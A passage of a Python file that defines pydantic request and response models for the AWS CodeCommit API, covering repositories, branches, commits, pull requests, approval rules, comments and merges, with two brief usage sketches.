__root__: Annotated[str, Field(max_length=256, min_length=0)]
class Target(BaseModel):
"""
Returns information about a target for a pull request.
"""
repositoryName: RepositoryName
sourceReference: ReferenceName
destinationReference: Optional[ReferenceName] = None
class AssociateApprovalRuleTemplateWithRepositoryInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
repositoryName: RepositoryName
class BatchAssociateApprovalRuleTemplateWithRepositoriesOutput(BaseModel):
associatedRepositoryNames: RepositoryNameList
errors: BatchAssociateApprovalRuleTemplateWithRepositoriesErrorsList
class BatchAssociateApprovalRuleTemplateWithRepositoriesInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
repositoryNames: RepositoryNameList
class BatchDescribeMergeConflictsInput(BaseModel):
repositoryName: RepositoryName
destinationCommitSpecifier: CommitName
sourceCommitSpecifier: CommitName
mergeOption: MergeOptionTypeEnum
maxMergeHunks: Optional[MaxResults] = None
maxConflictFiles: Optional[MaxResults] = None
filePaths: Optional[FilePaths] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
nextToken: Optional[NextToken] = None
class BatchDisassociateApprovalRuleTemplateFromRepositoriesOutput(BaseModel):
disassociatedRepositoryNames: RepositoryNameList
errors: BatchDisassociateApprovalRuleTemplateFromRepositoriesErrorsList
class BatchDisassociateApprovalRuleTemplateFromRepositoriesInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
repositoryNames: RepositoryNameList
class BatchGetCommitsInput(BaseModel):
commitIds: CommitIdsInputList
repositoryName: RepositoryName
class BatchGetRepositoriesInput(BaseModel):
"""
Represents the input of a batch get repositories operation.
"""
repositoryNames: RepositoryNameList
class CreateApprovalRuleTemplateOutput(BaseModel):
approvalRuleTemplate: ApprovalRuleTemplate
class CreateApprovalRuleTemplateInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
approvalRuleTemplateContent: ApprovalRuleTemplateContent
approvalRuleTemplateDescription: Optional[ApprovalRuleTemplateDescription] = None
class CreateBranchInput(BaseModel):
"""
Represents the input of a create branch operation.
"""
repositoryName: RepositoryName
branchName: BranchName
commitId: CommitId
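# Sketch: composing an input model from the __root__ wrappers defined earlier.
# Every scalar is wrapped (RepositoryName, BranchName, CommitId); the repository
# name, branch name and commit id below are placeholders.
def _create_branch_input_sketch():
    payload = CreateBranchInput(
        repositoryName=RepositoryName(__root__='demo-repo'),
        branchName=BranchName(__root__='feature/login'),
        commitId=CommitId(__root__='0123456789abcdef'),
    )
    return payload.branchName.__root__  # 'feature/login'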
class CreatePullRequestApprovalRuleInput(BaseModel):
pullRequestId: PullRequestId
approvalRuleName: ApprovalRuleName
approvalRuleContent: ApprovalRuleContent
class CreateRepositoryInput(BaseModel):
"""
Represents the input of a create repository operation.
"""
repositoryName: RepositoryName
repositoryDescription: Optional[RepositoryDescription] = None
tags: Optional[TagsMap] = None
class CreateUnreferencedMergeCommitOutput(BaseModel):
commitId: Optional[ObjectId] = None
treeId: Optional[ObjectId] = None
class DeleteApprovalRuleTemplateOutput(BaseModel):
approvalRuleTemplateId: ApprovalRuleTemplateId
class DeleteApprovalRuleTemplateInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
class DeleteBranchOutput(BaseModel):
"""
Represents the output of a delete branch operation.
"""
deletedBranch: Optional[BranchInfo] = None
class DeleteBranchInput(BaseModel):
"""
Represents the input of a delete branch operation.
"""
repositoryName: RepositoryName
branchName: BranchName
class DeleteCommentContentOutput(BaseModel):
comment: Optional[Comment] = None
class DeleteCommentContentInput(BaseModel):
commentId: CommentId
class DeleteFileOutput(BaseModel):
commitId: ObjectId
blobId: ObjectId
treeId: ObjectId
filePath: Path
class DeleteFileInput(BaseModel):
repositoryName: RepositoryName
branchName: BranchName
filePath: Path
parentCommitId: CommitId
keepEmptyFolders: Optional[KeepEmptyFolders] = None
commitMessage: Optional[Message] = None
name: Optional[Name] = None
email: Optional[Email] = None
class DeletePullRequestApprovalRuleOutput(BaseModel):
approvalRuleId: ApprovalRuleId
class DeletePullRequestApprovalRuleInput(BaseModel):
pullRequestId: PullRequestId
approvalRuleName: ApprovalRuleName
class DeleteRepositoryOutput(BaseModel):
"""
Represents the output of a delete repository operation.
"""
repositoryId: Optional[RepositoryId] = None
class DeleteRepositoryInput(BaseModel):
"""
Represents the input of a delete repository operation.
"""
repositoryName: RepositoryName
class DescribeMergeConflictsInput(BaseModel):
repositoryName: RepositoryName
destinationCommitSpecifier: CommitName
sourceCommitSpecifier: CommitName
mergeOption: MergeOptionTypeEnum
maxMergeHunks: Optional[MaxResults] = None
filePath: Path
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
nextToken: Optional[NextToken] = None
class DescribePullRequestEventsInput(BaseModel):
pullRequestId: PullRequestId
pullRequestEventType: Optional[PullRequestEventType] = None
actorArn: Optional[Arn] = None
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
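# Sketch: the Optional[...] fields above default to None, so a minimal request
# needs only the pull request id; the event-type filter reuses the
# PullRequestEventType enum defined earlier. The id value is a placeholder.
def _describe_pr_events_sketch():
    return DescribePullRequestEventsInput(
        pullRequestId=PullRequestId(__root__='42'),
        pullRequestEventType=PullRequestEventType.PULL_REQUEST_CREATED,
    )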
class DisassociateApprovalRuleTemplateFromRepositoryInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
repositoryName: RepositoryName
class EvaluatePullRequestApprovalRulesInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
class GetApprovalRuleTemplateOutput(CreateApprovalRuleTemplateOutput):
pass
class GetApprovalRuleTemplateInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
class GetBlobOutput(BaseModel):
"""
Represents the output of a get blob operation.
"""
content: Blob
class GetBlobInput(BaseModel):
"""
Represents the input of a get blob operation.
"""
repositoryName: RepositoryName
blobId: ObjectId
class GetBranchOutput(BaseModel):
"""
Represents the output of a get branch operation.
"""
branch: Optional[BranchInfo] = None
class GetBranchInput(BaseModel):
"""
Represents the input of a get branch operation.
"""
repositoryName: Optional[RepositoryName] = None
branchName: Optional[BranchName] = None
class GetCommentOutput(DeleteCommentContentOutput):
pass
class GetCommentInput(BaseModel):
commentId: CommentId
class GetCommentReactionsInput(BaseModel):
commentId: CommentId
reactionUserArn: Optional[Arn] = None
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class GetCommentsForComparedCommitInput(BaseModel):
repositoryName: RepositoryName
beforeCommitId: Optional[CommitId] = None
afterCommitId: CommitId
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class GetCommentsForPullRequestInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class GetCommitInput(BaseModel):
"""
Represents the input of a get commit operation.
"""
repositoryName: RepositoryName
commitId: ObjectId
class GetDifferencesOutput(BaseModel):
differences: Optional[DifferenceList] = None
NextToken: Optional[NextToken] = None
class GetDifferencesInput(BaseModel):
repositoryName: RepositoryName
beforeCommitSpecifier: Optional[CommitName] = None
afterCommitSpecifier: CommitName
beforePath: Optional[Path] = None
afterPath: Optional[Path] = None
MaxResults: Optional[Limit] = None
NextToken: Optional[NextToken] = None
class GetFileOutput(BaseModel):
commitId: ObjectId
blobId: ObjectId
filePath: Path
fileMode: FileModeTypeEnum
fileSize: ObjectSize
fileContent: FileContent
class GetFileInput(BaseModel):
repositoryName: RepositoryName
commitSpecifier: Optional[CommitName] = None
filePath: Path
class GetFolderInput(BaseModel):
repositoryName: RepositoryName
commitSpecifier: Optional[CommitName] = None
folderPath: Path
class GetMergeCommitOutput(BaseModel):
sourceCommitId: Optional[ObjectId] = None
destinationCommitId: Optional[ObjectId] = None
baseCommitId: Optional[ObjectId] = None
mergedCommitId: Optional[ObjectId] = None
class GetMergeCommitInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
class GetMergeConflictsInput(BaseModel):
repositoryName: RepositoryName
destinationCommitSpecifier: CommitName
sourceCommitSpecifier: CommitName
mergeOption: MergeOptionTypeEnum
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
maxConflictFiles: Optional[MaxResults] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
nextToken: Optional[NextToken] = None
class GetMergeOptionsOutput(BaseModel):
mergeOptions: MergeOptions
sourceCommitId: ObjectId
destinationCommitId: ObjectId
baseCommitId: ObjectId
class GetMergeOptionsInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
class GetPullRequestInput(BaseModel):
pullRequestId: PullRequestId
class GetPullRequestApprovalStatesOutput(BaseModel):
approvals: Optional[ApprovalList] = None
class GetPullRequestApprovalStatesInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
class GetPullRequestOverrideStateOutput(BaseModel):
overridden: Optional[Overridden] = None
overrider: Optional[Arn] = None
class GetPullRequestOverrideStateInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
class GetRepositoryInput(BaseModel):
"""
Represents the input of a get repository operation.
"""
repositoryName: RepositoryName
class GetRepositoryTriggersInput(BaseModel):
"""
Represents the input of a get repository triggers operation.
"""
repositoryName: RepositoryName
class ListApprovalRuleTemplatesOutput(BaseModel):
approvalRuleTemplateNames: Optional[ApprovalRuleTemplateNameList] = None
nextToken: Optional[NextToken] = None
class ListApprovalRuleTemplatesInput(BaseModel):
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class ListAssociatedApprovalRuleTemplatesForRepositoryOutput(
ListApprovalRuleTemplatesOutput
):
pass
class ListAssociatedApprovalRuleTemplatesForRepositoryInput(BaseModel):
repositoryName: RepositoryName
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class ListBranchesOutput(BaseModel):
"""
Represents the output of a list branches operation.
"""
branches: Optional[BranchNameList] = None
nextToken: Optional[NextToken] = None
class ListBranchesInput(BaseModel):
"""
Represents the input of a list branches operation.
"""
repositoryName: RepositoryName
nextToken: Optional[NextToken] = None
class ListPullRequestsOutput(BaseModel):
pullRequestIds: PullRequestIdList
nextToken: Optional[NextToken] = None
class ListPullRequestsInput(BaseModel):
repositoryName: RepositoryName
authorArn: Optional[Arn] = None
pullRequestStatus: Optional[PullRequestStatusEnum] = None
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class ListRepositoriesInput(BaseModel):
"""
Represents the input of a list repositories operation.
"""
nextToken: Optional[NextToken] = None
sortBy: Optional[SortByEnum] = None
order: Optional[OrderEnum] = None
class ListRepositoriesForApprovalRuleTemplateOutput(BaseModel):
repositoryNames: Optional[RepositoryNameList] = None
nextToken: Optional[NextToken] = None
class ListRepositoriesForApprovalRuleTemplateInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class ListTagsForResourceOutput(BaseModel):
tags: Optional[TagsMap] = None
nextToken: Optional[NextToken] = None
class ListTagsForResourceInput(BaseModel):
resourceArn: ResourceArn
nextToken: Optional[NextToken] = None
class MergeBranchesByFastForwardOutput(CreateUnreferencedMergeCommitOutput):
pass
class MergeBranchesByFastForwardInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
targetBranch: Optional[BranchName] = None
class MergeBranchesBySquashOutput(CreateUnreferencedMergeCommitOutput):
pass
class MergeBranchesByThreeWayOutput(CreateUnreferencedMergeCommitOutput):
pass
class MergePullRequestByFastForwardInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: RepositoryName
sourceCommitId: Optional[ObjectId] = None
class OverridePullRequestApprovalRulesInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
overrideStatus: OverrideStatus
class PostCommentReplyOutput(DeleteCommentContentOutput):
pass
class PostCommentReplyInput(BaseModel):
inReplyTo: CommentId
clientRequestToken: Optional[ClientRequestToken] = None
content: Content
class PutCommentReactionInput(BaseModel):
commentId: CommentId
reactionValue: ReactionValue
class PutFileOutput(BaseModel):
commitId: ObjectId
blobId: ObjectId
treeId: ObjectId
class PutFileInput(BaseModel):
repositoryName: RepositoryName
branchName: BranchName
fileContent: FileContent
filePath: Path
fileMode: Optional[FileModeTypeEnum] = None
parentCommitId: Optional[CommitId] = None
commitMessage: Optional[Message] = None
name: Optional[Name] = None
email: Optional[Email] = None
class PutRepositoryTriggersOutput(BaseModel):
"""
Represents the output of a put repository triggers operation.
"""
configurationId: Optional[RepositoryTriggersConfigurationId] = None
class TagResourceInput(BaseModel):
resourceArn: ResourceArn
tags: TagsMap
class TestRepositoryTriggersOutput(BaseModel):
"""
Represents the output of a test repository triggers operation.
"""
successfulExecutions: Optional[RepositoryTriggerNameList] = None
failedExecutions: Optional[RepositoryTriggerExecutionFailureList] = None
class UntagResourceInput(BaseModel):
resourceArn: ResourceArn
tagKeys: TagKeysList
class UpdateApprovalRuleTemplateContentOutput(CreateApprovalRuleTemplateOutput):
pass
class UpdateApprovalRuleTemplateContentInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
newRuleContent: ApprovalRuleTemplateContent
existingRuleContentSha256: Optional[RuleContentSha256] = None
class UpdateApprovalRuleTemplateDescriptionOutput(CreateApprovalRuleTemplateOutput):
pass
class UpdateApprovalRuleTemplateDescriptionInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
approvalRuleTemplateDescription: ApprovalRuleTemplateDescription
class UpdateApprovalRuleTemplateNameOutput(CreateApprovalRuleTemplateOutput):
pass
class UpdateApprovalRuleTemplateNameInput(BaseModel):
oldApprovalRuleTemplateName: ApprovalRuleTemplateName
newApprovalRuleTemplateName: ApprovalRuleTemplateName
class UpdateCommentOutput(DeleteCommentContentOutput):
pass
class UpdateCommentInput(BaseModel):
commentId: CommentId
content: Content
class UpdateDefaultBranchInput(BaseModel):
"""
Represents the input of an update default branch operation.
"""
repositoryName: RepositoryName
defaultBranchName: BranchName
class UpdatePullRequestApprovalRuleContentInput(BaseModel):
pullRequestId: PullRequestId
approvalRuleName: ApprovalRuleName
existingRuleContentSha256: Optional[RuleContentSha256] = None
newRuleContent: ApprovalRuleContent
class UpdatePullRequestApprovalStateInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
approvalState: ApprovalState
class UpdatePullRequestDescriptionInput(BaseModel):
pullRequestId: PullRequestId
description: Description
class UpdatePullRequestStatusInput(BaseModel):
pullRequestId: PullRequestId
pullRequestStatus: PullRequestStatusEnum
class UpdatePullRequestTitleInput(BaseModel):
pullRequestId: PullRequestId
title: Title
class UpdateRepositoryDescriptionInput(BaseModel):
"""
Represents the input of an update repository description operation.
"""
repositoryName: RepositoryName
repositoryDescription: Optional[RepositoryDescription] = None
class UpdateRepositoryNameInput(BaseModel):
"""
    Represents the input of an update repository name operation.
"""
oldName: RepositoryName
newName: RepositoryName
class OriginApprovalRuleTemplate(BaseModel):
"""
Returns information about the template that created the approval rule for a pull request.
"""
approvalRuleTemplateId: Optional[ApprovalRuleTemplateId] = None
approvalRuleTemplateName: Optional[ApprovalRuleTemplateName] = None
class ApprovalRule(BaseModel):
"""
Returns information about an approval rule.
"""
approvalRuleId: Optional[ApprovalRuleId] = None
approvalRuleName: Optional[ApprovalRuleName] = None
approvalRuleContent: Optional[ApprovalRuleContent] = None
ruleContentSha256: Optional[RuleContentSha256] = None
lastModifiedDate: Optional[LastModifiedDate] = None
creationDate: Optional[CreationDate] = None
lastModifiedUser: Optional[Arn] = None
originApprovalRuleTemplate: Optional[OriginApprovalRuleTemplate] = None
class ApprovalRulesList(BaseModel):
__root__: List[ApprovalRule]
class Location(BaseModel):
"""
Returns information about the location of a change or comment in the comparison between two commits or a pull request.
"""
filePath: Optional[Path] = None
filePosition: Optional[Position] = None
relativeFileVersion: Optional[RelativeFileVersionEnum] = None
class CommentsForComparedCommit(BaseModel):
"""
Returns information about comments on the comparison between two commits.
"""
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
beforeBlobId: Optional[ObjectId] = None
afterBlobId: Optional[ObjectId] = None
location: Optional[Location] = None
comments: Optional[Comments] = None
class CommentsForComparedCommitData(BaseModel):
__root__: List[CommentsForComparedCommit]
class CommentsForPullRequest(BaseModel):
"""
Returns information about comments on a pull request.
"""
pullRequestId: Optional[PullRequestId] = None
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
beforeBlobId: Optional[ObjectId] = None
afterBlobId: Optional[ObjectId] = None
location: Optional[Location] = None
comments: Optional[Comments] = None
class CommentsForPullRequestData(BaseModel):
__root__: List[CommentsForPullRequest]
class UserInfo(BaseModel):
"""
Information about the user who made a specified commit.
"""
name: Optional[Name] = None
email: Optional[Email] = None
date: Optional[Date] = None
class Commit(BaseModel):
"""
Returns information about a specific commit.
"""
commitId: Optional[ObjectId] = None
treeId: Optional[ObjectId] = None
parents: Optional[ParentList] = None
message: Optional[Message] = None
author: Optional[UserInfo] = None
committer: Optional[UserInfo] = None
additionalData: Optional[AdditionalData] = None
class MergeHunks(BaseModel):
__root__: List[MergeHunk]
class FileSizes(BaseModel):
"""
Information about the size of files in a merge or pull request.
"""
source: Optional[FileSize] = None
destination: Optional[FileSize] = None
base: Optional[FileSize] = None
class FileModes(BaseModel):
"""
Information about file modes in a merge or pull request.
"""
source: Optional[FileModeTypeEnum] = None
destination: Optional[FileModeTypeEnum] = None
base: Optional[FileModeTypeEnum] = None
class ObjectTypes(BaseModel):
"""
Information about the type of an object in a merge operation.
"""
source: Optional[ObjectTypeEnum] = None
destination: Optional[ObjectTypeEnum] = None
base: Optional[ObjectTypeEnum] = None
class DeleteFileEntries(BaseModel):
__root__: List[DeleteFileEntry]
class SetFileModeEntries(BaseModel):
__root__: List[SetFileModeEntry]
class FilesMetadata(BaseModel):
__root__: List[FileMetadata]
class TargetList(BaseModel):
__root__: List[Target]
class RepositoryMetadata(BaseModel):
"""
Information about a repository.
"""
accountId: Optional[AccountId] = None
repositoryId: Optional[RepositoryId] = None
repositoryName: Optional[RepositoryName] = None
repositoryDescription: Optional[RepositoryDescription] = None
defaultBranch: Optional[BranchName] = None
lastModifiedDate: Optional[LastModifiedDate] = None
creationDate: Optional[CreationDate] = None
cloneUrlHttp: Optional[CloneUrlHttp] = None
cloneUrlSsh: Optional[CloneUrlSsh] = None
Arn: Optional[Arn] = None
class Evaluation(BaseModel):
"""
Returns information about the approval rules applied to a pull request and whether conditions have been met.
"""
approved: Optional[Approved] = None
overridden: Optional[Overridden] = None
approvalRulesSatisfied: Optional[ApprovalRulesSatisfiedList] = None
approvalRulesNotSatisfied: Optional[ApprovalRulesNotSatisfiedList] = None
class SymbolicLinkList(BaseModel):
__root__: List[SymbolicLink]
class SubModuleList(BaseModel):
__root__: List[SubModule]
class RepositoryNameIdPairList(BaseModel):
__root__: List[RepositoryNameIdPair]
class PullRequestTargetList(BaseModel):
__root__: List[PullRequestTarget]
class PullRequestMergedStateChangedEventMetadata(BaseModel):
"""
Returns information about the change in the merge state for a pull request event.
"""
repositoryName: Optional[RepositoryName] = None
destinationReference: Optional[ReferenceName] = None
mergeMetadata: Optional[MergeMetadata] = None
class PullRequestEvent(BaseModel):
"""
Returns information about a pull request event.
"""
pullRequestId: Optional[PullRequestId] = None
eventDate: Optional[EventDate] = None
pullRequestEventType: Optional[PullRequestEventType] = None
actorArn: Optional[Arn] = None
pullRequestCreatedEventMetadata: Optional[PullRequestCreatedEventMetadata] = None
pullRequestStatusChangedEventMetadata: Optional[
PullRequestStatusChangedEventMetadata
] = None
pullRequestSourceReferenceUpdatedEventMetadata: Optional[
PullRequestSourceReferenceUpdatedEventMetadata
] = None
pullRequestMergedStateChangedEventMetadata: Optional[
PullRequestMergedStateChangedEventMetadata
] = None
approvalRuleEventMetadata: Optional[ApprovalRuleEventMetadata] = None
approvalStateChangedEventMetadata: Optional[
ApprovalStateChangedEventMetadata
] = None
approvalRuleOverriddenEventMetadata: Optional[
ApprovalRuleOverriddenEventMetadata
] = None
class PutFileEntry(BaseModel):
"""
Information about a file added or updated as part of a commit.
"""
filePath: Path
fileMode: Optional[FileModeTypeEnum] = None
fileContent: Optional[FileContent] = None
sourceFile: Optional[SourceFileSpecifier] = None
class ReactionValueFormats(BaseModel):
"""
Information about the values for reactions to a comment. AWS CodeCommit supports a limited set of reactions.
"""
emoji: Optional[ReactionEmoji] = None
shortCode: Optional[ReactionShortCode] = None
unicode: Optional[ReactionUnicode] = None
class ReactionForComment(BaseModel):
"""
Information about the reaction values provided by users on a comment.
"""
reaction: Optional[ReactionValueFormats] = None
reactionUsers: Optional[ReactionUsersList] = None
reactionsFromDeletedUsersCount: Optional[Count] = None
class ReplaceContentEntry(BaseModel):
"""
Information about a replacement content entry in the conflict of a merge or pull request operation.
"""
filePath: Path
replacementType: ReplacementTypeEnum
content: Optional[FileContent] = None
fileMode: Optional[FileModeTypeEnum] = None
class RepositoryTriggerEventList(BaseModel):
__root__: List[RepositoryTriggerEventEnum]
class RepositoryTrigger(BaseModel):
"""
Information about a trigger for a repository.
"""
name: RepositoryTriggerName
destinationArn: Arn
customData: Optional[RepositoryTriggerCustomData] = None
branches: Optional[BranchNameList] = None
events: RepositoryTriggerEventList
class CreateCommitOutput(BaseModel):
commitId: Optional[ObjectId] = None
treeId: Optional[ObjectId] = None
filesAdded: Optional[FilesMetadata] = None
filesUpdated: Optional[FilesMetadata] = None
filesDeleted: Optional[FilesMetadata] = None
class CreatePullRequestInput(BaseModel):
title: Title
description: Optional[Description] = None
targets: TargetList
clientRequestToken: Optional[ClientRequestToken] = None
class CreatePullRequestApprovalRuleOutput(BaseModel):
approvalRule: ApprovalRule
class CreateRepositoryOutput(BaseModel):
"""
Represents the output of a create repository operation.
"""
repositoryMetadata: Optional[RepositoryMetadata] = None
class EvaluatePullRequestApprovalRulesOutput(BaseModel):
evaluation: Evaluation
class GetCommentsForComparedCommitOutput(BaseModel):
commentsForComparedCommitData: Optional[CommentsForComparedCommitData] = None
nextToken: Optional[NextToken] = None
class GetCommentsForPullRequestOutput(BaseModel):
commentsForPullRequestData: Optional[CommentsForPullRequestData] = None
nextToken: Optional[NextToken] = None
class GetCommitOutput(BaseModel):
"""
Represents the output of a get commit operation.
"""
commit: Commit
class GetFolderOutput(BaseModel):
commitId: ObjectId
folderPath: Path
treeId: Optional[ObjectId] = None
subFolders: Optional[FolderList] = None
files: Optional[FileList] = None
symbolicLinks: Optional[SymbolicLinkList] = None
subModules: Optional[SubModuleList] = None
class GetRepositoryOutput(CreateRepositoryOutput):
"""
Represents the output of a get repository operation.
"""
pass
class ListRepositoriesOutput(BaseModel):
"""
Represents the output of a list repositories operation.
"""
repositories: Optional[RepositoryNameIdPairList] = None
nextToken: Optional[NextToken] = None
class PostCommentForComparedCommitOutput(BaseModel):
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
beforeBlobId: Optional[ObjectId] = None
afterBlobId: Optional[ObjectId] = None
location: Optional[Location] = None
comment: Optional[Comment] = None
class PostCommentForComparedCommitInput(BaseModel):
repositoryName: RepositoryName
beforeCommitId: Optional[CommitId] = None
afterCommitId: CommitId
location: Optional[Location] = None
content: Content
clientRequestToken: Optional[ClientRequestToken] = None
class PostCommentForPullRequestOutput(BaseModel):
repositoryName: Optional[RepositoryName] = None
pullRequestId: Optional[PullRequestId] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
beforeBlobId: Optional[ObjectId] = None
afterBlobId: Optional[ObjectId] = None
location: Optional[Location] = None
comment: Optional[Comment] = None
class PostCommentForPullRequestInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: RepositoryName
beforeCommitId: CommitId
afterCommitId: CommitId
location: Optional[Location] = None
content: Content
clientRequestToken: Optional[ClientRequestToken] = None
class UpdatePullRequestApprovalRuleContentOutput(CreatePullRequestApprovalRuleOutput):
pass
class CommitObjectsList(BaseModel):
__root__: List[Commit]
class RepositoryMetadataList(BaseModel):
__root__: List[RepositoryMetadata]
class ConflictMetadata(BaseModel):
"""
Information about the metadata for a conflict in a merge operation.
"""
filePath: Optional[Path] = None
fileSizes: Optional[FileSizes] = None
fileModes: Optional[FileModes] = None
objectTypes: Optional[ObjectTypes] = None
numberOfConflicts: Optional[NumberOfConflicts] = None
isBinaryFile: Optional[IsBinaryFile] = None
contentConflict: Optional[IsContentConflict] = None
fileModeConflict: Optional[IsFileModeConflict] = None
objectTypeConflict: Optional[IsObjectTypeConflict] = None
mergeOperations: Optional[MergeOperations] = None
class Conflict(BaseModel):
"""
Information about conflicts in a merge operation.
"""
conflictMetadata: Optional[ConflictMetadata] = None
mergeHunks: Optional[MergeHunks] = None
class ConflictMetadataList(BaseModel):
__root__: List[ConflictMetadata]
class ReplaceContentEntries(BaseModel):
__root__: List[ReplaceContentEntry]
class ConflictResolution(BaseModel):
"""
If AUTOMERGE is the conflict resolution strategy, a list of inputs to use when resolving conflicts during a merge.
"""
replaceContents: Optional[ReplaceContentEntries] = None
deleteFiles: Optional[DeleteFileEntries] = None
setFileModes: Optional[SetFileModeEntries] = None
class PutFileEntries(BaseModel):
__root__: List[PutFileEntry]
class PullRequest(BaseModel):
"""
Returns information about a pull request.
"""
pullRequestId: Optional[PullRequestId] = None
title: Optional[Title] = None
description: Optional[Description] = None
lastActivityDate: Optional[LastModifiedDate] = None
creationDate: Optional[CreationDate] = None
pullRequestStatus: Optional[PullRequestStatusEnum] = None
authorArn: Optional[Arn] = None
pullRequestTargets: Optional[PullRequestTargetList] = None
clientRequestToken: Optional[ClientRequestToken] = None
revisionId: Optional[RevisionId] = None
approvalRules: Optional[ApprovalRulesList] = None
class PullRequestEventList(BaseModel):
__root__: List[PullRequestEvent]
class ReactionsForCommentList(BaseModel):
__root__: List[ReactionForComment]
class RepositoryTriggersList(BaseModel):
__root__: List[RepositoryTrigger]
class BatchGetCommitsOutput(BaseModel):
commits: Optional[CommitObjectsList] = None
errors: Optional[BatchGetCommitsErrorsList] = None
class BatchGetRepositoriesOutput(BaseModel):
"""
Represents the output of a batch get repositories operation.
"""
repositories: Optional[RepositoryMetadataList] = None
repositoriesNotFound: Optional[RepositoryNotFoundList] = None
class CreateCommitInput(BaseModel):
repositoryName: RepositoryName
branchName: BranchName
parentCommitId: Optional[CommitId] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
commitMessage: Optional[Message] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
putFiles: Optional[PutFileEntries] = None
deleteFiles: Optional[DeleteFileEntries] = None
setFileModes: Optional[SetFileModeEntries] = None
class CreatePullRequestOutput(BaseModel):
pullRequest: PullRequest
class CreateUnreferencedMergeCommitInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
mergeOption: MergeOptionTypeEnum
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
commitMessage: Optional[Message] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class DescribeMergeConflictsOutput(BaseModel):
conflictMetadata: ConflictMetadata
mergeHunks: MergeHunks
nextToken: Optional[NextToken] = None
destinationCommitId: ObjectId
sourceCommitId: ObjectId
baseCommitId: Optional[ObjectId] = None
class DescribePullRequestEventsOutput(BaseModel):
pullRequestEvents: PullRequestEventList
nextToken: Optional[NextToken] = None
class GetCommentReactionsOutput(BaseModel):
reactionsForComment: ReactionsForCommentList
nextToken: Optional[NextToken] = None
class GetMergeConflictsOutput(BaseModel):
mergeable: IsMergeable
destinationCommitId: ObjectId
sourceCommitId: ObjectId
baseCommitId: Optional[ObjectId] = None
conflictMetadataList: ConflictMetadataList
nextToken: Optional[NextToken] = None
class GetPullRequestOutput(CreatePullRequestOutput):
pass
class GetRepositoryTriggersOutput(BaseModel):
"""
Represents the output of a get repository triggers operation.
"""
configurationId: Optional[RepositoryTriggersConfigurationId] = None
triggers: Optional[RepositoryTriggersList] = None
class MergeBranchesBySquashInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
targetBranch: Optional[BranchName] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
commitMessage: Optional[Message] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class MergeBranchesByThreeWayInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
targetBranch: Optional[BranchName] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
